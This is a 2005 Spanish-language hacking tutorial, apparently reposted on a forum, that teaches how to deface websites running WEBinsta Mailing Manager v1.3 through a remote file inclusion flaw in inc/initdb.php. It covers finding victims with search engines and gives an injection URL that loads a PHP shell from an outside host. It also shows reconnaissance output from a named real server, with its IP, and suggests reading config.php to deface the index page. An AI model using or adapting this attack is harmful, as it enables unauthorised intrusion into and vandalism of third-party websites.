############################################################################
*/
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion */ | Deface en WEBinsta Mailing v1.3
############################################################################
sh-2.05# ./ Escrito por Status-x [ phr4xz @gmail.com ] - Mexico
############################################################################
| * Bienvenida * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Saludos, agradezco la participacion que han tenido en los foros con sus men
sajes y tambiena todos los que visitan la pagina ya que las visitas van muy
bien
, esta vez les traigo un tutorial para hacer un deface en el sistema
WEBinsta Mailing Manager V1.3, el cual es vulnerable a file include
| * Buscando Victimas * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Para buscar victimas usaremos Google Y Yahoo para encontrar mas resultados
hehehe en este caso yo encontre la web
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion ahora veamos como explotaremos la falla
| * Explotando el fallo * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
La vulnerabilidad se encuentra en el archivo initdb.php que se encuentra en
el directorio /inc/, para explotar el fallo haremos lo siguiente:
Primero tenemos nuestra php-shell en un servidor
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Y a continuacion procedemos a hacer la inyeccion en el archivo vulnerable,
el fallo esta en la variable $absolute_path por lo cual nos quedaria la in
yeccion de la siguiente manera:
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesioninitdb.php?absolute_path=http://derf.hpgvip.com.br/newcmd.gif?&cmd=ls
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Y como vemos nos saldran todos los datos del servidor
####################################################################
sysname: Linux
nodename: dallas.hebergweb.com
release: 2.4.21-27.0.2.EL
version: #1 Wed Jan 19 02:20:34 GMT 2005
machine: i686
Script Current User: support
PHP Version: 4.3.10
User Info: uid(99) euid(99) gid(99)
Current Path: /home/support/public_html/support/mailling/maillist/inc
Server IP: 72.21.33.154
Web Server: Apache
#####################################################################
En este caso no tenemos permisos de escritura y el kernel NO es vulnerable
ya que cualquier kernel de Diciembre del 2004 a cualquier mes del 2005 no
son rooteables
Asi que podriamos leer el config.php y con suerte hacer un deface en el
index
, pero OJO no el config que nos sale ahi, tenemos que buscar el que
guarda la configuracion del WEBInsta Manager
Gracias por leer este txt hasta el final
| * Despedida * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Un saludo a todos los que leen este tutorial y si quieren que su nick aparez
ca en uno de estos textos en los saludos solo posteen en el foro
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion en el subforo SIN CATEGORIA
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques
############################################################################
Autor: Status-x
Autor